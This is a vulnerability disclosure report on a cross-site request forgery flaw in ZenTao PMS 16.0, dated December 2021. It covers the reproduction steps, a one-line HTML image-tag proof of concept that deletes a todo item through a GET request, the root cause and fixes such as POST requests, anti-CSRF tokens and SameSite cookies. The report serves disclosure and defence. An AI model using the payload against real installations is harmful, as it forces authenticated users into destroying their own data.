Cross-Site Request Forgery (CSRF) in easysoft/zentaopms
Dec 26th 2021
Zentaopms 16.0 is vulnerable to CSRF in the delete functionality.
Proof of Concept
1 - Go to
my section and create a
2 - Browse to
http://127.0.0.1/zentaopms/www/index.php?m=my&f=todo&type=all&userID=&status=all&orderBy=id_desc and take note of the
ID in the first column.
3 - Create the following page (use the
ID found at the step 2) and visit it in another browser tab while the admin is authenticated.
<html> <body> <img src="http://127.0.0.1/zentaopms/www/index.php?m=todo&f=delete&todoID=1&confirm=yes"> </body> </html>
4 - The
todo identified by the
ID 1 will be deleted.
The vulnerability is present because the function
https://github.com/easysoft/zentaopms/blob/master/www/js/my.full.js#L319 performs the delete operation using a GET request and no anti-CSRF token is used.
This vulnerability allows an attacker to force an end user to execute unwanted actions on the web application.
For all the operations which change the state on the server (add, edit, delete, etc.):
1 - Use HTTP POST request
2 - Use unpredictable and cryptographically strong anti-CSRF token sent along with the POST request
Samesite: Lax or
Samesite: Strict for the cookie